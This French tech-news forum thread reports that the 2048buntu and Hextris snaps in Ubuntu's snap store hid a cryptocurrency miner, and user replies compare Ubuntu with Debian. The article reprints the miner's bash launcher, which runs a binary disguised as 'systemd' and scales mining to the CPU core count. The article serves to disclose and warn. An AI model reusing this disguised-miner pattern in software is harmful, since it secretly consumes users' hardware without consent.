+ Répondre à la discussion Actualité déjà publiée
  1. #1
    Chroniqueur Actualités
    Avatar de Patrick Ruiz
    Homme Profil pro
    Rédacteur technique
    Inscrit en
    février 2017
    Messages
    504
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Rédacteur technique
    Secteur : Communication - Médias

    Informations forums :
    Inscription : février 2017
    Messages : 504
    Points : 16 832
    Points
    16 832

    Par défaut Ubuntu snap store : des utilisateurs découvrent un logiciel malveillant logé dans des applications

    Ubuntu snap store : des utilisateurs découvrent un logiciel malveillant logé dans des applications
    Un mineur de monnaie cryptographique

    L’époque où il fallait systématiquement lancer le terminal et taper un sudo pour installer une application est révolue dans l’univers de Linux. L’opération est grandement facilitée par la disponibilité de gestionnaires d’applications qui permettent la prise en charge d’une catégorie particulière de paquetage dénommée snaps. Un utilisateur attire l’attention de la communauté sur la potentielle présence de logiciels malveillants au sein du snap store de la distribution Linux maintenue par Canonical.

    En fait il est question de bien faire comprendre que la facilité avec laquelle les snaps peuvent être installés s’accompagne d’un revers. Dans le cas d’espèce, l’utilisateur qui fait usage du pseudonyme tawirdur sur GitHub tire la sonnette d’alarme sur le fait que l’application peut ne pas être saine. À l’heure où les monnaies cryptographiques ont le vent en poupe, des développeurs veulent se faire de l’argent sur le dos des ressources matérielles des utilisateurs de snaps et ce, à leur insu. Tawirdur a détecté que le snap 2048buntu contient un mineur de monnaies cryptographiques.

    Nom : 2048buntu-game-ubuntu-snap-store.png
Affichages : 2134
Taille : 40,6 Ko

    D’après ce que rapporte le site spécialisé Linux Uprising, l’application Hextris est dans la même situation. Tawirdur a publié une copie du script d’initialisation du mineur de monnaie cryptographique au sein du snap 2048buntu.

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    #!/bin/bash
    
    currency=bcn
    name=2048buntu
    
    
    { # try
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
    } || { # catch
    cores=($(grep -c ^processor /proc/cpuinfo))
    
    if (( $cores < 4 )); then
        /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
    else
        /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
    fi
    }
    Des cas d’infections sur l’App Store ou sur le Play Store sont rapportés de temps à autre malgré le processus de revue ou les restrictions mises en place par Apple et Google. Retrouver un malware au sein d’une boutique d’applications ne relève donc pas du scoop. Seulement, l’aisance avec laquelle n’importe qui peut publier une application sur le snap store d’Ubuntu interpelle. Il n’y a qu’à jeter un œil à la documentation liée pour se rendre compte que le tour est joué en trois étapes toutes simples ; pas de mention du terme contrôle par l’équipe en charge de la boutique d’applications.

    Il s’agit d’un problème quand on sait que certains snaps peuvent être publiés sous licence propriétaire pour compliquer la revue du code source à laquelle la communauté se livre de façon traditionnelle. Nicolas Tomb a publié le snap 2048buntu – un jeu développé par l’utilisateur qui fait usage du pseudonyme iirelu sur GitHub – sous licence MIT. La présence d’un mineur de cryptomonnaie en son sein peut donc bien être interprétée comme une intention manifeste de nuire.

    L’équipe en charge de la boutique de snaps gère les signalements au fur et à mesure qu’ils sont remontés par les utilisateurs. À date, les snaps 2048buntu et Hextris sont écartés et les investigations se poursuivent.

    Sources : linuxuprising, tawirdur, processus de publication d’un snap

    Et vous ?

    Qu’en pensez-vous ?

    S’agit-il d’un incident isolé ? La brèche est-elle utilisée à grande échelle ?

    Que faites-vous personnellement pour vous assurer assurer de ce que les snaps que vous décidez d’installer sont sains ?

    Voir aussi :

    Google Play Store : plus de 250 applications armées à l' « Alphonso », un logiciel qui analyse les contenus TV pour les annonceurs

    Apple procède à un nettoyage de son App Store pour se débarrasser des applications affectées par le malware XcodeGhost
    Contribuez au club : Corrections, suggestions, critiques, ... : Contactez le service news et Rédigez des actualités

  2. #2
    Membre à l'essai Avatar de Picarunix
    Femme Profil pro
    Lycéen
    Inscrit en
    octobre 2015
    Messages
    13
    Détails du profil
    Informations personnelles :
    Sexe : Femme
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Lycéen

    Informations forums :
    Inscription : octobre 2015
    Messages : 13
    Points : 20
    Points
    20

    Par défaut Liberté et sécurité.

    Ubuntu était une version améliorée de Debian.
    Désormais, avec ce genre d'idée, c'est une version dégradée de Debian.

    J'ai cru à un article du 1er avril ...

  3. #3
    Membre extrêmement actif
    Profil pro
    Développeur
    Inscrit en
    mars 2012
    Messages
    1 600
    Détails du profil
    Informations personnelles :
    Localisation : Belgique

    Informations professionnelles :
    Activité : Développeur
    Secteur : Communication - Médias

    Informations forums :
    Inscription : mars 2012
    Messages : 1 600
    Points : 2 659
    Points
    2 659

    Par défaut

    Depuis quand Ubuntu est une version "améliorée" de Debian?

    C'est un fork et/ou inspiré de Debian, mais ce n'est pas pour autant que c'est meilleur.
    Si la réponse vous a aidé, pensez à cliquer sur +1

  4. #4
    Membre actif
    Profil pro
    Inscrit en
    janvier 2014
    Messages
    102
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : janvier 2014
    Messages : 102
    Points : 201
    Points
    201

    Par défaut

    Ubuntu est "dérivé" de Debian qui était le projet source... la différence qui les distingues c'est en premier lieu leur but :
    Debian > ce veut devenir un OS universel, et odieusement stable !
    Ubuntu > ce veut être le plus facile d'utilisation possible.

    Debian à qq exception près (comme certains drivers notamment) est totalement libre et exempt de "blob" propriétaires.
    Ubuntu, lui, possède une base libre, mais y place quelques couches propriétaires (comme celle concernant la télémétrie si je ne m'abuse).
    Ubuntu permet au néophyte d'utiliser Linux, mais lui permet aussi les pires dérives (quand ce n'est pas directement la distro).
    Debian permet plus de possibilités sans les inconvénient... à condition d'avoir un bagage minimal... qui tend à être de plus en proche du néophyte.

Discussions similaires

  1. Réponses: 0
    Dernier message: 17/04/2017, 12h46
  2. Réponses: 4
    Dernier message: 11/08/2016, 17h29
  3. Réponses: 10
    Dernier message: 28/10/2010, 08h50
  4. Réponses: 10
    Dernier message: 28/10/2010, 08h50
  5. Réponses: 9
    Dernier message: 30/01/2007, 17h03

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo